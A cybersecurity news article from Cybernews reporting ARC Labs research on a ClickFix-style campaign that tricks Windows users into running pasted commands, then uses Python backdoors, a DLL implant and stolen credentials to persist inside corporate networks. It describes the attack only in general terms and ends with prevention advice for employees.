ClickFix access broker campaign hits Windows with Python-driven backdoors

Published: 9 February 2026
Microsoft Windows, vulnerability
Image by Cybernews.

Businesses are being warned about a new cyber campaign targeting Windows environments where getting in is only the beginning – not the end – of the attack.

Researchers say this ClickFix-style activity quickly moves beyond initial access, using Python-based tools, multiple backdoors, and stolen credentials to maintain long-term control inside corporate networks.

The campaign begins with a simple trick: persuading an employee to press 'Windows + R', type a command, and hit 'Enter'.

ADVERTISEMENT
jurgita justinasv Izabelė Pukėnaitė vilius Ernestas Naprys Gintaras Radauskas
Don't miss our latest stories on Google News
Google News Follow us

The activity uses a “CrashFix’-style approach – part of the wider ClickFix tactic recently documented by Microsoft – where employees are shown convincing error messages or fake IT prompts telling them something is broken and needs a quick fix.

The instructions feel routine, but the command subtly opens the door for attackers.

Last November, security firm Huntress reported a sophisticated ClickFix campaign that relies on fake Windows updates to trick users. However, in this instance, researchers at ARC Labs say the operation is notably more advanced, using Python-driven backdoors and other methods to maintain long-term access after entry.

Describing the attacker’s methods in a blog, ARC Labs – security firm Binary Defense’s threat research group – wrote that this reflects a broader shift in how attacks unfold inside organizations.

“Social engineering replaces exploits and malware is delivered through user interaction rather than vulnerability abuse," Arc Labs researchers flagged.

Blending into systems, using Python backdoors

Once the command is executed, attackers avoid obvious software malware and instead rely on legitimate Windows tools and in-memory scripts to blend into normal system behaviour.

ADVERTISEMENT

What distinguishes the campaign is the way access is maintained and expanded. Investigators observed extensive use of scripting and multiple backdoors deployed at once, allowing attackers to remain embedded even if one route is detected.

"Analysis of recovered artifacts confirmed the attacker deployed multiple independent implants, rather than relying on a single payload. The primary Python implant functioned as a lightweight backdoor capable of command execution, host reconnaissance, and follow-on payload delivery, largely orchestrating living-off-the-land activity through native Windows utilities and PowerShell rather than custom binaries."

ARC Labs

Researchers added that additional Python scripts (extentions.py, updates.py, udp.pyw) were deployed after initial access. In parallel, the attacker deployed "a reflectively loaded DLL backdoor" which had also been designed to avoid detection.

They also observed a clear transition to hands-on-keyboard activity, including active credential abuse and AD exploitation. They said the presence of multiple backdoors and sustained reconnaissance indicated a focus on maintaining long-term access, rather than quick monetization.

"The coexistence of Python backdoors and a reflective DLL implant highlights a deliberate defense-evasion and persistence strategy. By mixing scripting-based and native implants, the attacker reduced reliance on any single execution method, making complete eviction more difficult. This layered tooling aligns more closely with interactive intrusion and access brokerage operations than with single-purpose malware delivery."

"From a defender’s perspective, this blurs the line between scripting abuse and traditional malware."

ARC Labs

Targets include Active Directory

The intrusion then moves beyond automated compromise into direct operator involvement. Attackers begin mapping networks, identifying valuable systems, and targeting identity infrastructure such as Active Directory (AD).

ARC reports that the behavior has already been observed in real organization environments, where attackers installed persistent access, moved laterally across systems, and authenticated using compromised credentials.

clickfix phishing attack
Employees warned to treat unsolicited instructions, especially requests to open ‘Run and Paste’ commands, as a major warning sign.

Researchers stopped short of naming a specific ransomware gang, but say the activity strongly aligns with the access-broker ecosystem – criminal groups that specialize in breaking into organizations and selling the access on for later attacks.

ADVERTISEMENT

Although no ransomware was deployed in the incidents analyzed, the same foothold could later support data theft, extortion, or disruption.

The activity appears closely related to the CrashFix ClickFix variant recently documented by Microsoft last week, which also involved Python-based malware delivery. However, ARC researchers say this intrusion goes further, showing what happens after initial access — including credential abuse, multiple backdoors and hands-on activity inside Windows networks.

Prevention should be focused on the entry point, security researchers advise. Staff should treat unsolicited instructions, especially requests to open ‘Run and Paste’ commands, as a major warning sign. And to be mindful that the most dangerous part of this campaign is not how attackers get in, but what they do once they’re inside.

Unlock more exclusive Cybernews content on YouTube

Share
Post
Share
Share
Share
More from Cybernews
Companies using Fable 5 beware: it’s collecting your data, and there are no exceptions
World’s leading mathematicians ridicule AI hype in high-IQ declaration
Democrats are far more worried than Republicans that AI will take jobs, new poll finds
Europe’s tech revolution feels like Soviet déjà vu
New York demands advertisers use “synthetic performer” label or else
The surprising way Elon Musk is powering your next holiday flight
ADVERTISEMENT